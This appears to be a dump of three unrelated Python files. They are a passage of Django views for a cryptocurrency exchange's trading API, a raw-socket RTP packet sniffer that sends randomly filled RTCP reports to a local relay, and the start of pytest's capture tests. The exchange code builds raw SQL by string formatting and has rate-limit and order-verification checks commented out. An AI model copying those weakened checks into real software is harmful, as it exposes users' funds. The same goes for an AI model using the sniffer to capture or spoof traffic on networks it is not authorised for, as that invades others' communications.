if Mistake == 'incifition_funds':
Dict = {"status": Mistake, "description": _(u"У вас недостаточно средств для этой операции,"
u" пополните ваш счет во вкладке "
u"<a href='/finance'> \"финансы\" </a> ")}
elif Mistake == "MinCount":
Dict = {"status": Mistake, "description": _("Count of deal is too small")}
elif Mistake == "invalid_params":
Dict = {"status": Mistake, "description": _("Invalid params")}
else:
Dict = {"status": Mistake, "description": _("Some mistake has been occured, "
"try later, or call support")}
return Encoder.encode(Dict)
@my_cache()
def market_prices(Req):
Dict = None
Encoder = json.JSONEncoder()
prices = []
for item in TradePairs.objects.filter(status="processing").order_by("ordering"):
TopName = item.url_title + "_top_price"
Price = VolatileConsts.objects.get(Name=TopName)
prices.append({"type": TopName, "price": Price.Value})
RespJ = Encoder.encode({"prices": prices})
return RespJ
@json_auth_required
def remove_order(Req, Order):
Encoder = json.JSONEncoder()
FreqKey = "orders" + str(Req.user)
#if not check_freq(FreqKey, 3):
# Response = HttpResponse('{"status":false, "description":"frequancy limit"}')
# Response['Content-Type'] = 'application/json'
# return Response
if __inner_remove_order(Order, Req.user):
system_notify_async(order_canceled(Order), Req.user)
Dict = {"status": True}
RespJ = Encoder.encode(Dict)
Response = HttpResponse(RespJ)
Response['Content-Type'] = 'application/json'
return Response
else:
Dict = {"status": False, "description": _("A mistake has been occured during removing try one more")}
RespJ = Encoder.encode(Dict)
Response = HttpResponse(RespJ)
Response['Content-Type'] = 'application/json'
return Response
def __inner_remove_order(Order, User):
Order2Remove = OrdersMem.objects.get(user=User, id=int(Order), status="processing")
#if not Order2Remove.verify(str(User)) :
# return False
Market = TradePairs.objects.get(id=Order2Remove.trade_pair)
Order2Remove.status = "canceled"
Order2Remove.save()
Title = Market.url_title
LOCK = "trades" + Title
TradeLock = my_lock(LOCK)
#try:
Account = get_account(user_id=User, currency_id=Order2Remove.currency1)
cache = caching()
canceled_orders2deals(Order2Remove)
trans = add_trans2(Account,
-1*Order2Remove.sum1,
Order2Remove.currency1,
Order2Remove,
"order_cancel")
put2queue(('order_cancel', trans, Market, Order2Remove))
Order2Remove.archive()
Order2Remove.delete()
cache.delete_many(["buy_list_" + Title,
"sell_list_" + Title,
"balance_" + str(User),
'client_orders_' + str(User) + "_" + Title])
my_release(TradeLock)
return True
#except:
#my_release(TradeLock)
#return False
@json_auth_required
def sell(Req, Trade_pair):
FreqKey = "orders" + str(Req.user)
Start = time.time()
if not check_freq(FreqKey, 3):
Response = HttpResponse('{"status":false, "description":"frequancy limit"}')
Response['Content-Type'] = 'application/json'
return Response
getcontext().prec = settings.TRANS_PREC
try:
Count = Req.REQUEST.get("count")
Price = Req.REQUEST.get("price")
Count = Decimal(Count.replace(",", ".").strip())
Price = Decimal(Price.replace(",", ".").strip())
Count = to_prec(Count, settings.TRANS_PREC)
Price = to_prec(Price, settings.TRANS_PREC)
except:
Response = HttpResponse(process_mistake(Req, "invalid_params"))
Response['Content-Type'] = 'application/json'
return Response
if Price <= 0:
Response = HttpResponse(process_mistake(Req, "SumLess0"))
Response['Content-Type'] = 'application/json'
return Response
if Count <= 0:
Response = HttpResponse(process_mistake(Req, "CountLess0"))
Response['Content-Type'] = 'application/json'
return Response
TradePair = TradePairs.objects.get(url_title=Trade_pair)
LOCK = "trades" + TradePair.url_title
if TradePair.min_trade_base > Count:
Response = HttpResponse(process_mistake(Req, "MinCount"))
Response['Content-Type'] = 'application/json'
return Response
Custom = "0.0005" # Req.session["deal_comission"]
Comission = Decimal(Custom)
CurrencyOnS = Req.REQUEST.get("currency")
CurrencyBaseS = Req.REQUEST.get("currency1")
Amnt1 = Count
Amnt2 = Count * Price
CurrencyBase = Currency.objects.get(title=CurrencyBaseS)
CurrencyOn = Currency.objects.get(title=CurrencyOnS)
TradeLock = my_lock(LOCK)
order = OrdersMem(user=Req.user,
currency1=CurrencyOn.id,
sum1_history=Amnt1,
price=Price,
pub_date = datetime.now(),
sum1=Decimal("0.0"),
trade_pair=TradePair.id,
currency2 = CurrencyBase.id,
comission=Comission,
status="created",
type_deal = "sell")
order.save()
i = order.id
backend = TornadoServer.get_instance()
try:
FromAccount = get_account(user_id=Req.user, currency_id=CurrencyOn.id)
system_notify_async(deposit_funds(order, CurrencyOn), Req.user)
trans_deposit = add_trans2(FromAccount, Amnt1, CurrencyOn.id, order, "deposit")
put2queue(('deposit', trans_deposit, TradePair, order))
order = trans_deposit.order
order.status='processing'
order.save()
ResAuto = make_auto_trade(order, TradePair, order.price, CurrencyOn, Amnt1, CurrencyBase)
# adding locks
my_release(TradeLock)
logger_application.info("reees auto")
logger_application.info(ResAuto)
resp_body = process_auto(ResAuto, TradePair)
Response = HttpResponse(resp_body)
Response['Content-Type'] = 'application/json'
End = time.time()
measure = OrderTimer(order=i, time_work=str(End - Start), error="")
measure.save()
return Response
except Exception as e :
logger_application.critical(traceback.format_exc())
order.status = "canceled"
order.save()
Status = "unrecognized"
my_release(TradeLock)
Response = HttpResponse(process_mistake(Req, Status))
Response['Content-Type'] = 'application/json'
End = time.time()
tb = traceback.format_exc()
measure = OrderTimer(order=i, time_work=str(End - Start), error=tb)
measure.save()
return Response
@json_auth_required
def buy(Req, Trade_pair):
FreqKey = "orders" + str(Req.user)
Start = time.time()
if not check_freq(FreqKey, 3):
Response = HttpResponse('{"status":false, "description":"frequancy limit"}')
Response['Content-Type'] = 'application/json'
return Response
getcontext().prec = settings.TRANS_PREC
try:
Count = Req.REQUEST.get("count")
Price = Req.REQUEST.get("price")
Count = Decimal(Count.replace(",", ".").strip())
Price = Decimal(Price.replace(",", ".").strip())
Count = to_prec(Count, settings.TRANS_PREC)
Price = to_prec(Price, settings.TRANS_PREC)
except:
logger_application.error(traceback.format_exc())
Response = HttpResponse(process_mistake(Req, "invalid_params"))
Response['Content-Type'] = 'application/json'
return Response
if Price <= 0:
Response = HttpResponse(process_mistake(Req, "SumLess0"))
Response['Content-Type'] = 'application/json'
return Response
if Count <= 0:
Response = HttpResponse(process_mistake(Req, "CountLess0"))
Response['Content-Type'] = 'application/json'
return Response
TradePair = TradePairs.objects.get(url_title=Trade_pair)
LOCK = "trades" + TradePair.url_title
if TradePair.min_trade_base > Count:
Response = HttpResponse(process_mistake(Req, "MinCount"))
Response['Content-Type'] = 'application/json'
return Response
Custom = "0.0005" # Req.session["deal_comission"]
Comission = Decimal(Custom)
CurrencyOnS = Req.REQUEST.get("currency")
CurrencyBaseS = Req.REQUEST.get("currency1")
Amnt1 = Price * Count
Amnt2 = Count
CurrencyBase = Currency.objects.get(title=CurrencyBaseS)
CurrencyOn = Currency.objects.get(title=CurrencyOnS)
TradeLock = my_lock(LOCK)
order = OrdersMem(user=Req.user,
currency1=CurrencyBase.id,
currency2=CurrencyOn.id,
sum1_history=Amnt1,
price=Price,
pub_date=datetime.now(),
sum1=Decimal("0.0"),
trade_pair=TradePair.id,
comission=Comission,
status="created",
type_deal = "buy"
)
order.save()
i = order.id
try:
FromAccount = get_account(user_id=Req.user, currency_id=CurrencyBase.id)
system_notify_async(deposit_funds(order, CurrencyBase), Req.user)
# TODO Order to Encrypted object
trans_deposit = add_trans2(FromAccount, Amnt1, CurrencyBase.id, order, "deposit")
put2queue(('deposit', trans_deposit, TradePair, order))
order = trans_deposit.order
order.status = "processing"
order.save()
ResAuto = make_auto_trade(order, TradePair, order.price, CurrencyBase, Amnt1, CurrencyOn)
Response = HttpResponse(process_auto(ResAuto, TradePair))
my_release(TradeLock)
Response['Content-Type'] = 'application/json'
End = time.time()
measure = OrderTimer(order=i, time_work=str(End - Start), error="")
measure.save()
return Response
except Exception as e:
logger_application.info(traceback.format_exc())
order.status = "canceled"
order.save()
Status = "unrecognized"
Response = HttpResponse(process_mistake(Req, Status))
Response['Content-Type'] = 'application/json'
my_release(TradeLock)
End = time.time()
tb = traceback.format_exc()
measure = OrderTimer(order=i, time_work=str(End - Start), error=tb)
measure.save()
return Response
@json_auth_required
def bid(Req, UrlTitle):
CurrentTradePair = TradePairs.objects.get(url_title=UrlTitle)
SumList = []
Amount = Decimal("0")
TempSum = Decimal('0')
try:
Amount = Decimal(Req.REQUEST.get("amount", None))
Query = "SELECT * FROM main_ordersmem WHERE currency2=%i AND currency1=%i \
AND status='processing' \
AND user!=%i ORDER BY price DESC" % (
CurrentTradePair.currency_on.id,
CurrentTradePair.currency_from.id,
Req.user)
List = OrdersMem.objects.raw(Query)
for item in List:
if Amount > item.sum1:
Amount -= item.sum1
TempSum += item.sum1
SumList.append({"sum": item.sum1, "price": item.price})
else:
TempSum += Amount
SumList.append({"sum": Amount, "price": item.price})
break
except:
logger_application.info(traceback.format_exc())
Response = HttpResponse('{"status":false, "description":"amount is incorrect"}')
Response['Content-Type'] = 'application/json'
return Response
# format_numbers_strong(balance_buy.balance )
AvaragePrice = Decimal("0")
BuySum = Decimal("0")
for item in SumList:
BuySum += item['sum']
AvaragePrice += ((item['sum'] / TempSum) * item['price'] )
Dict = {"sell_sum": format_numbers_strong(BuySum),
"price": format_numbers_strong(AvaragePrice),
"status": True}
RespJ = json.JSONEncoder().encode(Dict)
return cached_json_object(RespJ)
@json_auth_required
def ask(Req, UrlTitle):
CurrentTradePair = TradePairs.objects.get(url_title=UrlTitle)
SumList = []
Amount = Decimal("0")
TempSum = Decimal('0')
try:
Amount = Decimal(Req.REQUEST.get("amount", None))
Query = "SELECT * FROM main_ordersmem WHERE currency1=%i AND currency2=%i \
AND status='processing' \
AND user!=%i ORDER BY price DESC" % (
CurrentTradePair.currency_on.id,
CurrentTradePair.currency_from.id,
Req.user)
List = OrdersMem.objects.raw(Query)
for item in List:
if Amount > item.sum1:
Amount -= item.sum1
TempSum += item.sum1
SumList.append({"sum": item.sum1, "price": item.price})
else:
TempSum += Amount
SumList.append({"sum": Amount, "price": item.price})
break
except:
logger_application.info(traceback.format_exc())
Response = HttpResponse('{"status":false, "description":"amount is incorrect"}')
Response['Content-Type'] = 'application/json'
return Response
# format_numbers_strong(balance_buy.balance )
AvaragePrice = Decimal("0")
BuySum = Decimal("0")
for item in SumList:
BuySum += item['sum']
AvaragePrice += ((item['sum'] / TempSum) * item['price'] )
Dict = {"buy_sum": format_numbers_strong(BuySum),
"price": format_numbers_strong(AvaragePrice),
"status": True}
RespJ = json.JSONEncoder().encode(Dict)
return cached_json_object(RespJ)
@my_cache()
def buy_list(Req, Pair):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
logger_application.info(traceback.format_exc())
return json_false500(Req)
BuyList = OrdersMem.objects.filter(status="processing",
currency1=Current.currency_from.id,
currency2=Current.currency_on.id)
getcontext().prec = settings.TRANS_PREC
Currency1Title = Current.currency_from.title
Currency2Title = Current.currency_on.title
List1 = {}
AccumBuySum = 0
for item in BuyList:
SellSum = item.sum1 ## UAH
BuySum = item.sum1/item.price ## LTC
Rate = item.price
AccumBuySum += SellSum
if List1.has_key(Rate):
List1[Rate][Currency1Title] = List1[Rate][Currency1Title] + SellSum
List1[Rate][Currency2Title] = List1[Rate][Currency2Title] + BuySum
else:
List1[Rate] = {Currency1Title: SellSum, Currency2Title: BuySum}
ResBuyList = []
LL = List1.keys()
L = []
for i in LL:
Temp = Decimal(i)
List1[Temp] = List1[i]
L.append(Temp)
L.sort()
L.reverse()
Price = 0
MaxPrice = 0
for i in L:
Price = format_numbers10(i)
ResBuyList.append({"price": Price,
"currency_trade": format_numbers10(List1[i][Currency2Title]),
"currency_base": format_numbers10(List1[i][Currency1Title])})
if len(ResBuyList):
MaxPrice = ResBuyList[0]["price"]
Dict = {"orders_sum": format_numbers10(AccumBuySum), "list": ResBuyList,
"max_price": MaxPrice, "min_price": Price}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@json_auth_required
def order_status(Req, Id):
Dict = {}
try:
order = Orders.objects.get(id=int(Id), user=Req.user)
Dict["pub_date"] = str(order.pub_date)
Dict["sum1"] = str(order.sum1)
Dict["id"] = str(Id)
Dict["sum2"] = str(order.sum2)
Dict["sum1_history"] = str(order.sum1_history)
Dict["sum2_history"] = str(order.sum2_history)
Dict["currency1"] = order.currency1.title
Dict["currency2"] = order.currency1.title
Dict["status"] = order.status
except Orders.DoesNotExist:
logger_application.error(traceback.format_exc())
return status_false()
Response = HttpResponse(json.JSONEncoder().encode(Dict))
Response['Content-Type'] = 'application/json'
return Response
@my_cache()
def balance(Req, User_id):
List = []
Dict = {}
for i in Accounts.objects.filter(user_id=User_id):
acc = get_account(user_id=User_id, currency_id=i.currency.id)
List.append({"balance": format_numbers10(acc.get_balance), "currency": i.currency.title})
User = Req.user
Dict["notify_count"] = Msg.objects.filter(user_to=User,
user_from_id=1,
user_hide_to="false",
user_seen_to="false").count()
Dict["msg_count"] = Msg.objects.filter(user_to=User,
user_hide_to="false",
user_seen_to="false").exclude(user_from_id=1).count()
try:
online = OnlineUsers(user_id=Req.user)
online.save()
except:
online = OnlineUsers.objects.get(user_id=Req.user)
online.pub_date = datetime.now()
online.save()
if Req.session.has_key('use_f2a'):
Dict["use_f2a"] = Req.session['use_f2a']
else:
Dict["use_f2a"] = False
Dict["accounts"] = List
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@json_auth_required
def user_balance(Req):
return balance(Req, Req.user)
# Dict["accounts"] = []
# Response = HttpResponse( json.JSONEncoder().encode(Dict) )
# Response['Content-Type'] = 'application/json'
# return Response
@my_cache()
def sell_list(Req, Pair):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
return json_false500(Req)
SellList = OrdersMem.objects.filter(status="processing",
currency1=Current.currency_on.id,
currency2=Current.currency_from.id)
getcontext().prec = 8
Currency1Title = Current.currency_from.title
Currency2Title = Current.currency_on.title
AccumSellSum = 0
GroupSellDict = {}
for item in SellList:
SellSum = item.sum1 ##LTC
BuySum = item.sum1 * item.price ## UAH
Rate = item.price
AccumSellSum += SellSum
if GroupSellDict.has_key(Rate):
GroupSellDict[Rate][Currency2Title] = GroupSellDict[Rate][Currency2Title] + SellSum
GroupSellDict[Rate][Currency1Title] = GroupSellDict[Rate][Currency1Title] + BuySum
else:
GroupSellDict[Rate] = {Currency2Title: SellSum, Currency1Title: BuySum}
ResSellList = []
LL = GroupSellDict.keys()
L = []
for i in LL:
Temp = Decimal(i)
GroupSellDict[Temp] = GroupSellDict[i]
L.append(Temp)
L.sort()
Price = 0
MinPrice = 0
for i in L:
Price = format_numbers10(i)
ResSellList.append({"price": Price,
"currency_trade": format_numbers10(GroupSellDict[i][Currency2Title]),
"currency_base": format_numbers10(GroupSellDict[i][Currency1Title])})
if len(ResSellList):
MinPrice = ResSellList[0]["price"]
Dict = {"orders_sum": format_numbers10(AccumSellSum),
"list": ResSellList,
"min_price": MinPrice,
"max_price": Price}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@my_cache()
def last_price(Req, Pair):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
return json_false500(Req)
Dict = None
try:
deal = DealsMemory.objects.filter(trade_pair=Current.id).latest("id")
Dict = {"price": format_numbers4(deal.price), "price_10": format_numbers10(deal.price)}
except:
Dict = {"price": "0", "price_10": "0.000000000"}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
### TODO stat
@my_cache()
def day_stat(Req, Pair):
Current = TradePairs.objects.get(url_title=Pair)
##last value 17520
cursor = connection.cursor()
Q = cursor.execute("SELECT sum(VolumeTrade) as VolumeTrade, \
sum(VolumeBase) as VolumeBase,\
max(Max) as Max,\
min(Min) as Min \
FROM main_stockstat WHERE main_stockstat.Stock_id=%i \
ORDER BY id DESC LIMIT 17520 " % Current.id)
List = dictfetchall(cursor, Q)
row = List[0]
for i in row:
if not row[i]:
row[i] = format_numbers4(Decimal("0"))
else:
row[i] = format_numbers4(Decimal(row[i]))
Dict = {"volume_base": row['VolumeBase'],
"volume_trade": row['VolumeTrade'],
"min": row['Min'],
"max": row['Max'],
}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@my_cache()
def high_japan_stat(Req, Pair):
Current = TradePairs.objects.get(url_title=Pair)
# last value 17520
List = StockStat.objects.raw("SELECT * FROM main_stockstat WHERE main_stockstat.Stock_id=%i \
ORDER BY id DESC LIMIT 17520 " % Current.id)
ListJson = []
VolumeBase = 0
VolumeTrade = 0
i = 0
for item in List:
StartDate = item.start_date
if i < 48:
VolumeTrade = VolumeTrade + item.VolumeTrade
VolumeBase = VolumeBase + item.VolumeBase
i += 1
Key = calendar.timegm(StartDate.utctimetuple())
ListJson.append([int(Key) * 1000, float(item.Start), float(item.Max), float(item.Min), float(item.End),
float(item.VolumeTrade)])
OnlineUsersCount = OnlineUsers.objects.count()
ListJson.reverse()
Dict = {"trades": ListJson,
"online": OnlineUsersCount,
"volume_base": str(VolumeBase),
"volume_trade": str(VolumeTrade)}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@my_cache()
def japan_stat(Req, Pair):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
return json_false500(Req)
List = StockStat.objects.raw("SELECT * FROM main_stockstat WHERE main_stockstat.Stock_id=%i \
ORDER BY id DESC LIMIT 48 " % Current.id)
ListJson = []
VolumeBase = 0
VolumeTrade = 0
for item in List:
StartDate = item.start_date
VolumeTrade = VolumeTrade + item.VolumeTrade
VolumeBase = VolumeBase + item.VolumeBase
Key = "%i:%i" % (StartDate.hour, StartDate.minute)
ListJson.append(
[Key, float(item.Start), float(item.Max), float(item.Min), float(item.End), float(item.VolumeTrade)])
OnlineUsersCount = OnlineUsers.objects.count()
ListJson.reverse()
Dict = {"trades": ListJson,
"online": OnlineUsersCount,
"volume_base": str(VolumeBase),
"volume_trade": str(VolumeTrade)}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
##TODO add date filters
@my_cache(30)
def deal_list(Req, Pair):
ResList = common_deal_list(Pair)
JsonP = json.JSONEncoder().encode(ResList)
return JsonP
def common_deal_list(Pair, User_id=None):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
return json_false500(Req)
ldeals = None
startdate = datetime.now()
# TODO adding paging for client orders
if User_id is None:
enddate = startdate - timedelta(days=30)
ldeals = DealsMemory.objects.filter(trade_pair=Current.id, pub_date__gte=enddate).order_by('-pub_date')[:200]
else:
enddate = startdate - timedelta(days=365)
ldeals = DealsMemory.objects.filter(trade_pair=Current.id, user_id=User_id, pub_date__gte=enddate ).order_by('-pub_date')[:200]
ResList = []
for item in ldeals:
new_item = {}
rate = item.price
new_item['pub_date'] = (item.pub_date - datetime(1970,1,1)).total_seconds() # formats.date_format(item.pub_date, "DATETIME_FORMAT")
new_item["type"] = item.type_deal
new_item["user"] = item.user
new_item["price"] = format_numbers10(rate)
new_item["amnt_base"] = format_numbers10(item.amnt_base)
new_item["amnt_trade"] = format_numbers10(item.amnt_trade)
ResList.append(new_item)
return ResList
@json_auth_required
def my_closed_orders(Req, Pair):
ResList = common_deal_list(Pair, Req.user)
Response = HttpResponse(json.JSONEncoder().encode(ResList))
Response['Content-Type'] = 'application/json'
return Response
@my_cache()
def client_orders(Req, User_id, Title):
Dict = {}
Current = None
try:
Current = TradePairs.objects.get(url_title=Title)
except:
return json_false500(Req)
Dict["auth"] = True
MyOrders = OrdersMem.objects.filter(user = User_id,
trade_pair = Current.id,
status='processing')
MyOrdersList = []
c = getcontext()
c.prec = settings.TRANS_PREC
for i in MyOrders:
MyOrdersDict = {}
MyOrdersDict["pub_date"] = (i.pub_date-datetime(1970,1,1)).total_seconds()
# formats.date_format(i.pub_date, "DATETIME_FORMAT")
MyOrdersDict["id"] = i.id
MyOrdersDict["sum1"] = str(i.sum1)
if i.currency1 == Current.currency_on.id:
MyOrdersDict["type"] = "sell"
MyOrdersDict["price"] = format_numbers10(i.price)
MyOrdersDict["amnt_trade"] = format_numbers10(i.sum1)
MyOrdersDict["amnt_base"] = format_numbers10(i.sum1*i.price)
else:
MyOrdersDict["type"] = "buy"
MyOrdersDict["price"] = format_numbers10(i.price)
MyOrdersDict["amnt_base"] = format_numbers10(i.sum1)
MyOrdersDict["amnt_trade"] = format_numbers10(i.sum1/i.price)
MyOrdersList.append(MyOrdersDict)
balance_sell = get_account(user_id=User_id, currency=Current.currency_on)
balance_buy = get_account(user_id=User_id, currency=Current.currency_from)
Dict["balance_buy"] = format_numbers_strong(balance_buy.get_balance)
Dict["balance_sell"] = format_numbers_strong(balance_sell.get_balance)
Dict["your_open_orders"] = MyOrdersList
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@json_auth_required
def my_orders(Req, Title):
return client_orders(Req, Req.user, Title)
|
sniffer.py
|
#packet sniffer in python
#for linux
import socket
from struct import *
from multiprocessing import Process, Lock, Pipe, Value
import random
import sched, time
ip_send_rtcp_on = '127.0.0.1'
port_send_rtcp_on = 5009
rtcp_sending_delay = 30 #in seconds
def giveRandom(givenRange=(0,5000)):
return random.randint(givenRange[0],givenRange[1])
def slice_bin_to_tuple(bin_string, indices):
bin_string_tuple = [bin_string[s:e]for s,e in indices] # creating a list of all the values in binary string
return tuple([int(e,2) for e in bin_string_tuple]) #converting all the values to int and putting them in the tuple
def parse_rtp_header(packet):
vpxccm, payload, sequence_number, timestamp, ssrc = unpack('!BBHII', packet)
#converting the first byte to different values
vpxccm_bin = bin(vpxccm)[2:]
indices = [(0,2), (2,3), (3,4), (4,7), (7,8)] #creating indices to splice the string at
version, padding, ext_bit, cc, m = slice_bin_to_tuple(vpxccm_bin, indices)
return {"version": version, "padding": padding, "ext_bit": ext_bit, "cc": cc, "m": m, "payload": payload, "sequence_number": sequence_number, "timestamp": timestamp, "ssrc": ssrc}
def sniff_rtp(conn):
#create an INET RAW socket
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP)
ip_header_length = 20
udp_header_length = 8
rtp_header_length = 12
print 'Socket opened to sniff UDP packets'
#receive a packet
while True:
packet, server = s.recvfrom(65536)
ip_header = unpack('!BBHHHBBH4s4s',packet[0:ip_header_length])
destination_address = socket.inet_ntoa(ip_header[9])
source_port, destination_port, udp_packet_length, checksum = unpack('!HHHH', packet[ip_header_length:ip_header_length+udp_header_length])
#print 'Source port: {}, Desination port: {}, Length: {}, Checksum: {}'.format(source_port, destination_port, udp_packet_length, checksum)
rtp_packet_length = udp_packet_length-udp_header_length
rtp_packet = packet[ip_header_length+udp_header_length:ip_header_length+udp_header_length+rtp_packet_length]
#print len(rtp_packet)
if destination_address == '192.168.2.66' and destination_port == 5004:
rtp_header = rtp_packet[0:12]
conn.send(parse_rtp_header(rtp_header))
def send_rtcp_packet(sc, sock, ssrc, frac_cum, extended, interval_gitter, last_sr, delay):
print "Doing stuff after 30 s..."
vprc = 129
rt = 201
length = 64
if delay.value == 0:
delay.value = 1
else:
delay.value = 0
rtcp_packet = pack('!BBHIIIIIII', vprc, rt, length, ssrc.value, ssrc.value, frac_cum.value, extended.value, interval_gitter.value, last_sr.value, delay.value)
#send the socket to the relay
sock.sendto(rtcp_packet, (ip_send_rtcp_on, port_send_rtcp_on))
print unpack('!BBHIIIIIII', rtcp_packet)
sc.enter(30, 1, send_rtcp_packet, (sc,sock,ssrc,frac_cum, extended, interval_gitter, last_sr, delay))
def processRTP(conn,ssrc, frac_cum, extended, interval_gitter, last_sr, delay):
print 'Sending RTCP process opened'
#initializing the data structure
frac_cum.value = giveRandom()
extended.value = giveRandom()
interval_gitter.value = giveRandom()
last_sr.value = giveRandom()
delay.value = giveRandom(range(0,2))
while True:
rtp_header = conn.recv()
ssrc.value = rtp_header['ssrc']
#frac_cum.value = giveRandom()
#extended.value = giveRandom()
#interval_gitter.value = giveRandom()
#last_sr.value = giveRandom()
#delay.value = giveRandom(range(0,10))
#print rtp_header['ssrc']
if __name__ == '__main__':
jobs = []
parent, child = Pipe()
rtpSniffingProcess = Process(target = sniff_rtp, args=(child,))
jobs.append(rtpSniffingProcess)
lock = Lock()
ssrc = Value('d', 0.0, lock=lock)
frac_cum = Value('d', 0.0, lock=lock)
extended = Value('d', 0.0, lock=lock)
interval_gitter = Value('d', 0.0, lock=lock)
last_sr = Value('d', 0.0, lock=lock)
delay = Value('d', 0.0, lock=lock)
rtpProcessingProcess = Process(target = processRTP, args=(parent,ssrc,frac_cum, extended, interval_gitter, last_sr, delay))
jobs.append(rtpProcessingProcess)
for job in jobs:
job.start()
#create the socket to send the RTCP Receiver reports to relay
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# schedule a function that gets the data structure as the arguments
s = sched.scheduler(time.time, time.sleep)
s.enter(30, 1, send_rtcp_packet, (s,sock, ssrc,frac_cum, extended, interval_gitter, last_sr, delay))
s.run()
|
test_capture.py
|
import contextlib
import io
import os
import pickle
import subprocess
import sys
import textwrap
from io import StringIO
from io import UnsupportedOperation
from typing import BinaryIO
from typing import Generator
from typing import List
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.config import ExitCode
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
needsosdup = pytest.mark.skipif(
not hasattr(os, "dup"), reason="test needs os.dup, not available on this platform"
)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
def TeeStdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.TeeSysCapture)
class TestCaptureManager:
def test_getmethod_default_no_fd(self, monkeypatch):
from _pytest.capture import pytest_addoption
from _pytest.config.argparsing import Parser
parser = Parser()
pytest_addoption(parser)
default = parser._groups[0].options[0].default
assert default == "fd" if hasattr(os, "dup") else "sys"
parser = Parser()
monkeypatch.delattr(os, "dup", raising=False)
pytest_addoption(parser)
assert parser._groups[0].options[0].default == "sys"
@pytest.mark.parametrize(
"method", ["no", "sys", pytest.param("fd", marks=needsosdup)]
)
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@needsosdup
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
